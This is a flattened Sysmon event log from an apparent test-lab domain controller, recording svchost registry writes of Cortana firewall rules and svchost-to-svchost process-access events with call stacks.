13:58:21.977{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{374DAA60-FD2D-429E-89D1-2D6C8D4F6FF9}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Security=Authenticate| 13241300x800000000000000010699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:21.977{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{E5FB4F7F-5604-4310-A7FC-3E188A2CBB2A}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Security=Authenticate| 13241300x800000000000000010698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:21.961{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{4683413D-3BD0-4208-952F-0348ABF4134F}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 10341000x800000000000000010697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
13241300x800000000000000010696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{DBDF160F-57DD-401E-907E-451C865C0799}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 10341000x800000000000000010695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{C2B1AEE4-901E-47A0-AC4B-9875C605F362}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 10341000x800000000000000010689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{14E26735-492C-4F05-ACD2-9DAD9E15FD8B}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 10341000x800000000000000010687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 